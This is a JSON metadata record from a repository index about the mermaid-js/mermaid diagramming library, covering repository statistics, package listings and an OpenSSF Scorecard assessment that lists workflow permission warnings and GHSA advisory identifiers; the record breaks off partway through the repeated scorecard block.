{"id":57922,"name":"mermaid","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","url":"https://github.com/mermaid-js/mermaid","last_synced_at":"2025-09-05T15:02:45.416Z","repository":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":185,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273713621,"owners_count":25154614,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-05T02:00:09.113Z","response_time":402,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"owner":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"packages":[{"id":9141896,"name":"@eten-lab/mermaid-monorepo","ecosystem":"npm","description":"Markdownish syntax for generating flowcharts, sequence diagrams, class diagrams, gantt charts and git graphs.","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","flowchart","sequence diagram","gantt","class diagram","git graph"],"namespace":"eten-lab","versions_count":1,"first_release_published_at":"2024-02-27T16:59:29.369Z","latest_release_published_at":"2024-02-27T16:59:29.369Z","latest_release_number":"10.2.4","last_synced_at":"2025-09-01T12:55:58.623Z","created_at":"2024-02-27T17:00:26.247Z","updated_at":"2025-09-01T14:17:50.518Z","registry_url":"https://www.npmjs.com/package/@eten-lab/mermaid-monorepo","install_command":"npm install @eten-lab/mermaid-monorepo","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"10.2.4"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed 